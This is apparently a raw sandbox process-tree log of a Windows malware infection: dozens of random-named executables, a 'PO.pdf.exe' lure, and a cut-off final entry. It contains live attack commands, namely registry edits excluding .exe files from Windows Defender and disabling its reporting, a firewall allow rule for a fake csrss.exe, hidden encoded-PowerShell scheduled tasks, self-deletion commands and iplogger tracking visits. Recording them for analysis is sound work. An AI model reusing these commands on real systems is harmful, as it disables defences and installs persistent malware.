C:\Users\Admin\Pictures\Fm42PXgwGlsEZO8TWoWkN0cW.exe
"C:\Users\Admin\Pictures\Fm42PXgwGlsEZO8TWoWkN0cW.exe"
4⤵
PID:8716

C:\Users\Admin\Pictures\Fm42PXgwGlsEZO8TWoWkN0cW.exe
"C:\Users\Admin\Pictures\Fm42PXgwGlsEZO8TWoWkN0cW.exe"
5⤵
PID:4484

C:\Users\Admin\Pictures\i9k80QWHk1oL2S7469M1Rkq1.exe
"C:\Users\Admin\Pictures\i9k80QWHk1oL2S7469M1Rkq1.exe"
4⤵
PID:8832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8832 -s 856
5⤵
- Program crash
PID:7888

C:\Users\Admin\Pictures\p5asz514mSwKix2MQfT1BY0g.exe
"C:\Users\Admin\Pictures\p5asz514mSwKix2MQfT1BY0g.exe"
4⤵
PID:8804

C:\Windows\SYSTEM32\cmd.exe
cmd /c hing.bat
5⤵
PID:8968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2TPq55
6⤵
PID:9588

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\1powerreduceproie.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\1powerreduceproie.exe
5⤵
PID:9664

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1powerreducepro.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1powerreducepro.exe
6⤵
PID:3616

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\powerreduce.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\powerreduce.exe
7⤵
PID:8012

C:\Users\Admin\Pictures\F3j9Gfk2YVzXd6rr5uHKwGwb.exe
"C:\Users\Admin\Pictures\F3j9Gfk2YVzXd6rr5uHKwGwb.exe"
4⤵
PID:9016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9016 -s 1684
5⤵
- Program crash
PID:10796

C:\Users\Admin\Pictures\lmrp5BJPaX5cHn5pzUNUcnPD.exe
"C:\Users\Admin\Pictures\lmrp5BJPaX5cHn5pzUNUcnPD.exe"
4⤵
PID:8956

C:\Users\Admin\Pictures\mpMKY0dXwDe5vBAkEYRovCbI.exe
"C:\Users\Admin\Pictures\mpMKY0dXwDe5vBAkEYRovCbI.exe"
4⤵
PID:9040

C:\Users\Admin\Pictures\QPJ045SJxVLPJenUEp8HGaTz.exe
"C:\Users\Admin\Pictures\QPJ045SJxVLPJenUEp8HGaTz.exe"
4⤵
PID:9032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9032 -s 1620
5⤵
- Program crash
PID:7604

C:\Users\Admin\Pictures\ZSJFngl5zeeWgIOqSZtlRkcI.exe
"C:\Users\Admin\Pictures\ZSJFngl5zeeWgIOqSZtlRkcI.exe"
4⤵
PID:9204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:10180

C:\Users\Admin\Pictures\ZSJFngl5zeeWgIOqSZtlRkcI.exe
"C:\Users\Admin\Pictures\ZSJFngl5zeeWgIOqSZtlRkcI.exe"
5⤵
PID:11228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:8956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8956 -s 1796
7⤵
- Program crash
PID:7872

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:5968

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:10256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5640

C:\Users\Admin\Pictures\BwsBREqAQg2l2ty5AxFHhuGt.exe
"C:\Users\Admin\Pictures\BwsBREqAQg2l2ty5AxFHhuGt.exe" --silent --allusers=0
4⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BwsBREqAQg2l2ty5AxFHhuGt.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BwsBREqAQg2l2ty5AxFHhuGt.exe" --version
5⤵
PID:8948

C:\Users\Admin\Pictures\BwsBREqAQg2l2ty5AxFHhuGt.exe
C:\Users\Admin\Pictures\BwsBREqAQg2l2ty5AxFHhuGt.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x69775648,0x69775658,0x69775664
5⤵
PID:9796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 476
5⤵
- Program crash
PID:8764

C:\Users\Admin\Pictures\HCpBDY3E41wFKMFUdgoloU3n.exe
"C:\Users\Admin\Pictures\HCpBDY3E41wFKMFUdgoloU3n.exe"
4⤵
PID:10104

C:\Users\Admin\Pictures\SWgS3klMX7HAQrwLHdNoFHom.exe
"C:\Users\Admin\Pictures\SWgS3klMX7HAQrwLHdNoFHom.exe"
4⤵
PID:8600

C:\Users\Admin\Pictures\Kg9A9q9I2OIADjpF1z2cMDo2.exe
"C:\Users\Admin\Pictures\Kg9A9q9I2OIADjpF1z2cMDo2.exe"
4⤵
PID:10528

C:\Users\Admin\Pictures\Kg9A9q9I2OIADjpF1z2cMDo2.exe
"C:\Users\Admin\Pictures\Kg9A9q9I2OIADjpF1z2cMDo2.exe"
5⤵
PID:9912

C:\Users\Admin\Pictures\KAqml9UxvwVPexfV9tqNGfUI.exe
"C:\Users\Admin\Pictures\KAqml9UxvwVPexfV9tqNGfUI.exe"
4⤵
PID:8544

C:\Windows\SYSTEM32\cmd.exe
cmd /c hing.bat
5⤵
PID:7980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2TPq55
6⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1powerreduceproie.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1powerreduceproie.exe
5⤵
PID:8512

C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\1powerreducepro.exe
C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\1powerreducepro.exe
6⤵
PID:9752

C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\powerreduce.exe
C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\powerreduce.exe
7⤵
PID:7748

C:\Users\Admin\Pictures\K24obWokeQhZTcyzrcIzkJei.exe
"C:\Users\Admin\Pictures\K24obWokeQhZTcyzrcIzkJei.exe"
4⤵
PID:2372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:10384

C:\Users\Admin\Pictures\xmXfHQFxyJg6tWTo1SzljvJv.exe
"C:\Users\Admin\Pictures\xmXfHQFxyJg6tWTo1SzljvJv.exe"
4⤵
PID:1816

C:\Users\Admin\Pictures\ZsVqr6msx0V9v0DWaraW6ys4.exe
"C:\Users\Admin\Pictures\ZsVqr6msx0V9v0DWaraW6ys4.exe"
4⤵
PID:6284

C:\Users\Admin\Pictures\KQVP5oRiawmyumH8A5GTg6Hp.exe
"C:\Users\Admin\Pictures\KQVP5oRiawmyumH8A5GTg6Hp.exe"
4⤵
PID:4372

C:\Users\Admin\Pictures\vQ7U5ReDODR5blrj2ZiYP2rQ.exe
"C:\Users\Admin\Pictures\vQ7U5ReDODR5blrj2ZiYP2rQ.exe" --silent --allusers=0
4⤵
PID:9516

C:\Users\Admin\Pictures\vQ7U5ReDODR5blrj2ZiYP2rQ.exe
C:\Users\Admin\Pictures\vQ7U5ReDODR5blrj2ZiYP2rQ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x30c,0x310,0x314,0x2e8,0x318,0x69be5648,0x69be5658,0x69be5664
5⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vQ7U5ReDODR5blrj2ZiYP2rQ.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vQ7U5ReDODR5blrj2ZiYP2rQ.exe" --version
5⤵
PID:4472

C:\Users\Admin\Pictures\5fnhrikXzfDc4whIeo0qtfwd.exe
"C:\Users\Admin\Pictures\5fnhrikXzfDc4whIeo0qtfwd.exe"
4⤵
PID:7936

C:\Users\Admin\Pictures\8M4FFu44Lvbnxoi8FF4YTtVR.exe
"C:\Users\Admin\Pictures\8M4FFu44Lvbnxoi8FF4YTtVR.exe"
4⤵
PID:10284

C:\Users\Admin\Pictures\W3XEgL4yzIz31c9uy0EdWNUz.exe
"C:\Users\Admin\Pictures\W3XEgL4yzIz31c9uy0EdWNUz.exe"
4⤵
PID:4400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:7580

C:\Users\Admin\Pictures\HhnHsoOf3Dp42us9u22rhVvW.exe
"C:\Users\Admin\Pictures\HhnHsoOf3Dp42us9u22rhVvW.exe"
4⤵
PID:1004

C:\Users\Admin\Desktop\a\Ads.exe
"C:\Users\Admin\Desktop\a\Ads.exe"
2⤵
PID:4776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:3084

C:\Users\Admin\Pictures\zVlcFyxxnZG6pJyiQJpf6gqS.exe
"C:\Users\Admin\Pictures\zVlcFyxxnZG6pJyiQJpf6gqS.exe"
4⤵
PID:5976

C:\Users\Admin\Pictures\fpzbrcnTLVGrNFbOjb0PmWpi.exe
"C:\Users\Admin\Pictures\fpzbrcnTLVGrNFbOjb0PmWpi.exe"
4⤵
PID:5800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4100

C:\Users\Admin\Pictures\fpzbrcnTLVGrNFbOjb0PmWpi.exe
"C:\Users\Admin\Pictures\fpzbrcnTLVGrNFbOjb0PmWpi.exe"
5⤵
PID:5036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:8080

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8080" "2108" "2088" "2116" "0" "0" "2120" "0" "0" "0" "0" "0"
7⤵
PID:7184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:9748

C:\Users\Admin\Pictures\wm6dPknCn1nQ3rZi7Nn5qNAx.exe
"C:\Users\Admin\Pictures\wm6dPknCn1nQ3rZi7Nn5qNAx.exe"
4⤵
PID:8820

C:\Users\Admin\AppData\Local\Temp\is-V8KPT.tmp\wm6dPknCn1nQ3rZi7Nn5qNAx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V8KPT.tmp\wm6dPknCn1nQ3rZi7Nn5qNAx.tmp" /SL5="$309D8,2974431,224768,C:\Users\Admin\Pictures\wm6dPknCn1nQ3rZi7Nn5qNAx.exe"
5⤵
PID:9336

C:\Users\Admin\Pictures\uuiumNFYnwNOCePOr2g64MZa.exe
"C:\Users\Admin\Pictures\uuiumNFYnwNOCePOr2g64MZa.exe"
4⤵
PID:8852

C:\Users\Admin\Pictures\uuiumNFYnwNOCePOr2g64MZa.exe
"C:\Users\Admin\Pictures\uuiumNFYnwNOCePOr2g64MZa.exe"
5⤵
PID:8572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5133035246.exe"
6⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\5133035246.exe
"C:\Users\Admin\AppData\Local\Temp\5133035246.exe"
7⤵
PID:7776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "uuiumNFYnwNOCePOr2g64MZa.exe" /f & erase "C:\Users\Admin\Pictures\uuiumNFYnwNOCePOr2g64MZa.exe" & exit
6⤵
PID:11164

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "uuiumNFYnwNOCePOr2g64MZa.exe" /f
7⤵
- Kills process with taskkill
PID:8252

C:\Users\Admin\Pictures\r0xaGV3YBtyMVWqh3RU0qHXi.exe
"C:\Users\Admin\Pictures\r0xaGV3YBtyMVWqh3RU0qHXi.exe"
4⤵
PID:8840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\r0xaGV3YBtyMVWqh3RU0qHXi.exe" & exit
5⤵
PID:8960

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
6⤵
- Delays execution with timeout.exe
PID:8844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8840 -s 2024
5⤵
- Program crash
PID:8920

C:\Users\Admin\Pictures\jruLMsGs6ujN094n7qBs0vxf.exe
"C:\Users\Admin\Pictures\jruLMsGs6ujN094n7qBs0vxf.exe"
4⤵
PID:8812

C:\Users\Admin\Pictures\jruLMsGs6ujN094n7qBs0vxf.exe
"C:\Users\Admin\Pictures\jruLMsGs6ujN094n7qBs0vxf.exe"
5⤵
PID:9772

C:\Users\Admin\Pictures\8QffrupSrb2LvhH05nVQTM43.exe
"C:\Users\Admin\Pictures\8QffrupSrb2LvhH05nVQTM43.exe"
4⤵
PID:9428

C:\Users\Admin\Pictures\CHBb1shqSBlJS5Nh2qEPGcLM.exe
"C:\Users\Admin\Pictures\CHBb1shqSBlJS5Nh2qEPGcLM.exe" --silent --allusers=0
4⤵
PID:9652

C:\Users\Admin\Pictures\CHBb1shqSBlJS5Nh2qEPGcLM.exe
C:\Users\Admin\Pictures\CHBb1shqSBlJS5Nh2qEPGcLM.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x30c,0x310,0x314,0x2e8,0x318,0x692c5648,0x692c5658,0x692c5664
5⤵
PID:10160

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CHBb1shqSBlJS5Nh2qEPGcLM.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CHBb1shqSBlJS5Nh2qEPGcLM.exe" --version
5⤵
PID:524

C:\Users\Admin\Pictures\xNnx8gTCmayhRptXm07TJCsq.exe
"C:\Users\Admin\Pictures\xNnx8gTCmayhRptXm07TJCsq.exe"
4⤵
PID:9824

C:\Users\Admin\AppData\Local\Temp\7zS670E.tmp\Install.exe
.\Install.exe
5⤵
PID:8944

C:\Users\Admin\AppData\Local\Temp\7zS95EE.tmp\Install.exe
.\Install.exe /VGngdidU "385118" /S
6⤵
PID:3800

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:7040

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:4240

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:6388

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:6140

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:9084

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:1192

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:7436

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:6912

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gECDDtVrP" /SC once /ST 02:24:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:1436

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gECDDtVrP"
7⤵
PID:6644

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gECDDtVrP"
7⤵
PID:2516

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsxbnVOyALBYOoKnMh" /SC once /ST 17:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\SlLSuqM.exe\" pg /fjsite_idmxJ 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:8624

C:\Users\Admin\Pictures\xRz0ahrSLC14MFZfrbwvbilP.exe
"C:\Users\Admin\Pictures\xRz0ahrSLC14MFZfrbwvbilP.exe"
4⤵
PID:9520

C:\Users\Admin\Pictures\SYntYd7VR7pLtIVrMdHfGQGy.exe
"C:\Users\Admin\Pictures\SYntYd7VR7pLtIVrMdHfGQGy.exe"
4⤵
PID:9868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9868 -s 280
5⤵
- Program crash
PID:9348

C:\Users\Admin\Pictures\m538puJH3aApcCl3WJAtVlbH.exe
"C:\Users\Admin\Pictures\m538puJH3aApcCl3WJAtVlbH.exe"
4⤵
PID:6676

C:\Users\Admin\Pictures\HofuCrvlKz4RFojKhnSIs3it.exe
"C:\Users\Admin\Pictures\HofuCrvlKz4RFojKhnSIs3it.exe"
4⤵
PID:7028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\HofuCrvlKz4RFojKhnSIs3it.exe" & exit
5⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 2028
5⤵
- Program crash
PID:5244

C:\Users\Admin\Pictures\KjkuOUJdtp2xyngiMDDCdddA.exe
"C:\Users\Admin\Pictures\KjkuOUJdtp2xyngiMDDCdddA.exe" --silent --allusers=0
4⤵
PID:8516

C:\Users\Admin\Pictures\KjkuOUJdtp2xyngiMDDCdddA.exe
C:\Users\Admin\Pictures\KjkuOUJdtp2xyngiMDDCdddA.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x67f95648,0x67f95658,0x67f95664
5⤵
PID:3076

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\KjkuOUJdtp2xyngiMDDCdddA.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\KjkuOUJdtp2xyngiMDDCdddA.exe" --version
5⤵
PID:5360

C:\Users\Admin\Pictures\ERZJL5WPqKyj1GkW2AEURBTY.exe
"C:\Users\Admin\Pictures\ERZJL5WPqKyj1GkW2AEURBTY.exe"
4⤵
PID:8072

C:\Users\Admin\AppData\Local\Temp\7zSFFE0.tmp\Install.exe
.\Install.exe
5⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\7zS18C7.tmp\Install.exe
.\Install.exe /VGngdidU "385118" /S
6⤵
PID:5588

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:10916

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:4832

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:5832

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:4892

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:7400

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:636

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:8724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQpBzqHEx" /SC once /ST 04:23:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:10640

C:\Users\Admin\Desktop\a\obizx.exe
"C:\Users\Admin\Desktop\a\obizx.exe"
2⤵
PID:7480

C:\Users\Admin\Desktop\a\obizx.exe
"C:\Users\Admin\Desktop\a\obizx.exe"
3⤵
PID:6116

C:\Users\Admin\Desktop\a\PO.pdf.exe
"C:\Users\Admin\Desktop\a\PO.pdf.exe"
2⤵
PID:7388

C:\Users\Admin\Desktop\a\DH.exe
"C:\Users\Admin\Desktop\a\DH.exe"
2⤵
PID:8380

C:\Users\Admin\Desktop\a\DH.exe
"C:\Users\Admin\Desktop\a\DH.exe"
3⤵
PID:8752

C:\Users\Admin\Desktop\a\raaa.exe
"C:\Users\Admin\Desktop\a\raaa.exe"
2⤵
PID:9128

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
2⤵
PID:9832

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
3⤵
PID:10696

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
3⤵
PID:8460

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
3⤵
PID:10532

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
3⤵
PID:11212

C:\Users\Admin\Desktop\a\aao.exe
"C:\Users\Admin\Desktop\a\aao.exe"
3⤵
PID:10424

C:\Users\Admin\Desktop\a\owenzx.exe
"C:\Users\Admin\Desktop\a\owenzx.exe"
2⤵
PID:9664

C:\Users\Admin\Desktop\a\owenzx.exe
"C:\Users\Admin\Desktop\a\owenzx.exe"
3⤵
PID:1924

C:\Users\Admin\Desktop\a\owenzx.exe
"C:\Users\Admin\Desktop\a\owenzx.exe"
3⤵
PID:8184

C:\Users\Admin\Desktop\a\ghostzx.exe
"C:\Users\Admin\Desktop\a\ghostzx.exe"
2⤵
PID:9008

C:\Users\Admin\Desktop\a\ghostzx.exe
"C:\Users\Admin\Desktop\a\ghostzx.exe"
3⤵
PID:8268

C:\Users\Admin\Desktop\a\isbinzx.exe
"C:\Users\Admin\Desktop\a\isbinzx.exe"
2⤵
PID:524

C:\Users\Admin\Desktop\a\isbinzx.exe
"C:\Users\Admin\Desktop\a\isbinzx.exe"
3⤵
PID:8440

C:\Users\Admin\Desktop\a\newrock.exe
"C:\Users\Admin\Desktop\a\newrock.exe"
2⤵
PID:7312

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
PID:1700

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1560
3⤵
- Program crash
PID:4680

C:\Users\Admin\Desktop\a\pablozx.exe
"C:\Users\Admin\Desktop\a\pablozx.exe"
2⤵
PID:9892

C:\Users\Admin\Desktop\a\pablozx.exe
"C:\Users\Admin\Desktop\a\pablozx.exe"
3⤵
PID:10660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10660 -s 220
4⤵
- Program crash
PID:10900

C:\Users\Admin\Desktop\a\humblezx.exe
"C:\Users\Admin\Desktop\a\humblezx.exe"
2⤵
PID:2124

C:\Users\Admin\Desktop\a\humblezx.exe
"C:\Users\Admin\Desktop\a\humblezx.exe"
3⤵
PID:4688

C:\Users\Admin\Desktop\a\humblezx.exe
"C:\Users\Admin\Desktop\a\humblezx.exe"
3⤵
PID:1224

C:\Users\Admin\Desktop\a\humblezx.exe
"C:\Users\Admin\Desktop\a\humblezx.exe"
3⤵
PID:8684

C:\Users\Admin\Desktop\a\source2.exe
"C:\Users\Admin\Desktop\a\source2.exe"
2⤵
PID:4608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:8972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
